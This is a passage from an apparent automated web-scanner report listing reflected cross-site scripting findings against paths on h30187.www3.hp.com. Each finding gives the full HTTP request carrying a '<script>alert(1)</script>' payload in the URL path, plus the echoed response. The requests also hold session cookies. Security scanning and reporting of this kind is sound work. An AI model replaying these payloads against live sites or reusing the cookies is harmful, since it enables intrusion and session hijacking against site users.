Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/cmdatatagutils.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb321"><script>alert(1)</script>cb8c8ea3085 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics/cmdatatagutils.jscb321"><script>alert(1)</script>cb8c8ea3085?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30553


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/cmdatatagutils.jscb321"><script>alert(1)</script>cb8c8ea3085?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.55. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175cc"><script>alert(1)</script>017088e4729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources175cc"><script>alert(1)</script>017088e4729/scripts/coremetrics/v40/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources175cc"><script>alert(1)</script>017088e4729/scripts/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.56. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa671"><script>alert(1)</script>0c8dbad185f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsfa671"><script>alert(1)</script>0c8dbad185f/coremetrics/v40/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:02 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30942


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfa671"><script>alert(1)</script>0c8dbad185f/coremetrics/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.57. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47497"><script>alert(1)</script>2129490ee66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics47497"><script>alert(1)</script>2129490ee66/v40/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:09 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30985


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics47497"><script>alert(1)</script>2129490ee66/v40/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.58. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4fd"><script>alert(1)</script>a8ac50bab5b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics/v40ce4fd"><script>alert(1)</script>a8ac50bab5b/eluminate.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:11 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40ce4fd"><script>alert(1)</script>a8ac50bab5b/eluminate.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.59. http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/coremetrics/v40/eluminate.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35bd7"><script>alert(1)</script>6000b59c9da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/coremetrics/v40/eluminate.js35bd7"><script>alert(1)</script>6000b59c9da?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:12 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/coremetrics/v40/eluminate.js35bd7"><script>alert(1)</script>6000b59c9da?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.60. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bd8"><script>alert(1)</script>7215cf1e60b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcese3bd8"><script>alert(1)</script>7215cf1e60b/scripts/dragdrop.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:55 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30756


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcese3bd8"><script>alert(1)</script>7215cf1e60b/scripts/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.61. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20ab1"><script>alert(1)</script>1956d4d9dbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts20ab1"><script>alert(1)</script>1956d4d9dbf/dragdrop.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:56 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30655


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts20ab1"><script>alert(1)</script>1956d4d9dbf/dragdrop.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.62. http://h30187.www3.hp.com/resources/scripts/dragdrop.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/dragdrop.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd15a"><script>alert(1)</script>a3a4eb3735f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/dragdrop.jsbd15a"><script>alert(1)</script>a3a4eb3735f?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/dragdrop.jsbd15a"><script>alert(1)</script>a3a4eb3735f?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.63. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/effects.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e9cc"><script>alert(1)</script>64d1b4e31c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources6e9cc"><script>alert(1)</script>64d1b4e31c2/scripts/effects.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30928


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources6e9cc"><script>alert(1)</script>64d1b4e31c2/scripts/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.64. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/effects.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31e71"><script>alert(1)</script>a466e2d5896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts31e71"><script>alert(1)</script>a466e2d5896/effects.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30657


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts31e71"><script>alert(1)</script>a466e2d5896/effects.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.65. http://h30187.www3.hp.com/resources/scripts/effects.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/effects.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 515ba"><script>alert(1)</script>8c0eede2f57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/effects.js515ba"><script>alert(1)</script>8c0eede2f57?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30871


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/effects.js515ba"><script>alert(1)</script>8c0eede2f57?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.66. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/powered_utils.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c727"><script>alert(1)</script>83474b9d897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources8c727"><script>alert(1)</script>83474b9d897/scripts/powered_utils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:22 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30724


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources8c727"><script>alert(1)</script>83474b9d897/scripts/powered_utils.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.67. http://h30187.www3.hp.com/resources/scripts/powered_utils.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/powered_utils.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37d5c"><script>alert(1)</script>d1b7c146211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts37d5c"><script>alert(1)</script>d1b7c146211/powered_utils.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
